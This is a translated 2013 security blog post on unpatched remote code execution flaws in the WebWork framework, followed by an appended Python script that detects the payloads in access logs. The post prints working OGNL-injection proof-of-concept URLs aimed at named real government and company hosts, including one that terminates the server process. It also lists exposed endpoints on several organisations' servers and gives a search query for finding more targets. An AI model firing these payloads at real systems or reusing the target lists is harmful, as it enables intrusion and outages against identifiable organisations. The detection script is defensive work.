
A memorial to a framework with long-forgotten remote code execution vulnerabilities

2013-11-12 11:15
WebWork is a powerful web-based MVC framework built on top of a Command-pattern framework called XWork.

For details see the Baidu Baike entry: http://baike.baidu.com/view/25660.htm

As an important and powerful MVC framework in J2EE history, it was WebWork that served as the stand-in during the transition from Struts 1 to Struts 2 once Struts 1 had run its course. The fact that Struts 2 chose to merge with WebWork and reused a large amount of its core code and structure shows just how strong it was!

Because Struts 2 kept many of WebWork's features and characteristics, any Struts 2 vulnerability that lies in functionality Struts 2 did not itself add also exists in WebWork! You just have to read the WebWork source code when writing the PoC and exploit!
 
For example, the familiar Struts 2 vulnerability PoC from July 2010:

http://www.hanchuan.gov.cn:8080/kdgs/biz/portal/govservice/catalogServiceSummary.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1

http://211.137.133.80/csp/kbs/displayKnowledgeFirstPage.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1

 

Another example: the recent S2-016 Struts 2 vulnerability PoC:

http://www.hanchuan.gov.cn:8080/kdgs/biz/portal/govservice/catalogServiceSummary.action?redirect:${%23rep%3d%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27%29,%23rep.getWriter%28%29.println%28%23application%29,%23rep.getWriter%28%29.flush%28%29,%23rep.getWriter%28%29.close%28%29}

http://211.137.133.80/csp/kbs/displayKnowledgeFirstPage.action?redirect:${%23rep%3d%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27%29,%23rep.getWriter%28%29.println%28%23application%29,%23rep.getWriter%28%29.flush%28%29,%23rep.getWriter%28%29.close%28%29}

 

 
 
 
 
 
Of course, WebWork is used far more widely than this:

For example, a large number of applications from Shanghai Mansuo Computer Technology Co., Ltd., and their product Mainsoft, make heavy use of the WebWork framework:

http://www.mansuo.com/home/index.action?redirect:${%23rep%3d%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27%29,%23rep.getWriter%28%29.println%28%23application%29,%23rep.getWriter%28%29.flush%28%29,%23rep.getWriter%28%29.close%28%29}

Mainsoft customer list:

http://www.mansuo.com/home/newsList.action?typeIds=2

If these were deployed on an internal network the damage would be contained somewhat, but some of them are deployed on the public internet.

For example, this Google search key (the title of the "Integrated R&D Management Platform" login page):

intitle:集成化研发管理平台登录页面
 



Even when deployed on the public internet, a URL that does not pass through the WebWork framework's request flow is of no use (it appears Struts 1 and WebWork are used side by side). But I did find a registration function that is exposed through the external WebWork implementation:

http://114.242.194.148/rdms/satisfyaid/actions/cstContactAction!register.action

http://pmo.cfischina.com/rdms/satisfyaid/actions/cstContactAction!register.action

http://218.85.36.216:8085/rdms/satisfyaid/actions/cstContactAction!register.action

http://center.ylzinfo.com:8085/rdms/satisfyaid/actions/cstContactAction!register.action

http://rdms.mansuo.com/rdms/satisfyaid/actions/cstContactAction!register.action

http://service.epsoft.com.cn/rdms/satisfyaid/actions/cstContactAction!register.action

http://116.228.221.108:22480/rdms/satisfyaid/actions/cstContactAction!register.action

...
 
 
 
PS: Since there will never be another patch, the exploits for command execution and writing a webshell, and the method of finding targets, certainly cannot be disclosed! If you are really determined (many of its characteristics are the same as Struts 2, after all), it becomes easy once you are familiar with it!

For example, here is a side-by-side comparison of one PoC; I changed only one small thing:

Struts 2:

redirect:${%23rep%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23rep.getWriter%28%29.println%28%22struts2Bug-67c2c13e9cc0c312973c90245537fd04%22%29,%23rep.getWriter%28%29.flush%28%29,%23rep.getWriter%28%29.close%28%29}

WebWork:

redirect:${%23rep%3d%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27%29,%23rep.getWriter%28%29.println%28%22webWorkBug-9de3deb185db08ab775d3fa8ad6aed8e%22%29,%23rep.getWriter%28%29.flush%28%29,%23rep.getWriter%28%29.close%28%29}
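The comparison above makes a practical point for defenders: the only difference between the Struts 2 and WebWork payloads is the package name (xwork2 versus xwork), so a detection rule keyed on the Struts 2 string alone misses the WebWork variant, and both payload families hide the OGNL marker characters behind percent-encoding or \u escapes. The following Python script is an added example, not code from the post: it decodes request targets from access-log lines, matches the indicator shapes seen in the PoCs quoted above (the indicator list itself is an assumption for this example), and reports which framework a request appears to target. The log lines are constructed with placeholder addresses and paths.

```python
import re
from urllib.parse import unquote

# Markers of OGNL expression injection in WebWork/Struts 2 request parameters.
# This list is an assumption for this example; it reflects the shapes of the
# PoCs quoted in the post, not any vendor-published signature set.
INDICATORS = {
    "member_access": re.compile(r"#_memberAccess", re.I),
    "context_access": re.compile(r"#context\b", re.I),
    "deny_method_execution": re.compile(r"xwork\.MethodAccessor\.denyMethodExecution", re.I),
    "static_method_call": re.compile(r"@[\w.]+@\w+"),
    "redirect_expression": re.compile(r"redirect(?:Action)?:\$\{", re.I),
}

# The package name is the only thing that differs between the two PoCs in the
# post: xwork2 means Struts 2, plain xwork means WebWork.
FRAMEWORK_HINT = re.compile(r"com\.opensymphony\.(xwork2?)\.dispatcher", re.I)

# Request line inside an Apache/nginx combined-format access log entry.
LOG_REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def normalise(raw):
    """Undo the encodings a payload can hide behind: percent-encoding (applied
    twice, to catch double encoding) and the \\uXXXX escapes OGNL accepts."""
    text = unquote(unquote(raw))
    return re.sub(r"\\u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), text)


def analyse_request(path_and_query):
    """Return (list of indicator names, framework hint or None) for one request target."""
    decoded = normalise(path_and_query)
    hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
    hint = FRAMEWORK_HINT.search(decoded)
    framework = None
    if hint:
        framework = "struts2" if hint.group(1).lower() == "xwork2" else "webwork"
    return hits, framework


def scan_log(lines):
    """Return (client, action path, indicators, framework) for each suspicious entry."""
    findings = []
    for line in lines:
        m = LOG_REQUEST.search(line)
        if not m:
            continue
        hits, framework = analyse_request(m.group(1))
        if hits:
            client = line.split(" ", 1)[0]
            action = m.group(1).split("?", 1)[0]
            findings.append((client, action, hits, framework))
    return findings


# Constructed sample log lines with placeholder addresses and paths. The payload
# shapes follow the PoCs in the post; the fourth line is the Struts 2 variant.
SAMPLE_LOG = [
    r'''10.0.0.5 - - [12/Nov/2013:11:15:01 +0800] "GET /app/home/index.action?redirect:${%23rep%3d%23context.get(%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27),%23rep.getWriter().println(%23application)} HTTP/1.1" 200 512''',
    r'''10.0.0.6 - - [12/Nov/2013:11:15:02 +0800] "GET /app/catalog.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean(%22false%22)))=1 HTTP/1.1" 200 0''',
    r'''10.0.0.7 - - [12/Nov/2013:11:15:03 +0800] "GET /app/home/newsList.action?typeIds=2 HTTP/1.1" 200 2048''',
    r'''10.0.0.8 - - [12/Nov/2013:11:15:04 +0800] "GET /app/home/index.action?redirect:${%23rep%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27)} HTTP/1.1" 302 0''',
]

if __name__ == "__main__":
    for client, action, hits, framework in scan_log(SAMPLE_LOG):
        print(f"{client} {action} target={framework or 'unknown'} indicators={','.join(hits)}")
```

Decoding before matching matters because the page's own PoCs write `#` as `\u0023` in one payload and as `%23` in the other. Requests that trip these indicators should be blocked at the edge, and since WebWork no longer receives patches, the application behind them needs to be migrated rather than merely filtered.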
Source: www.2cto.com/Article/201311/256915.html
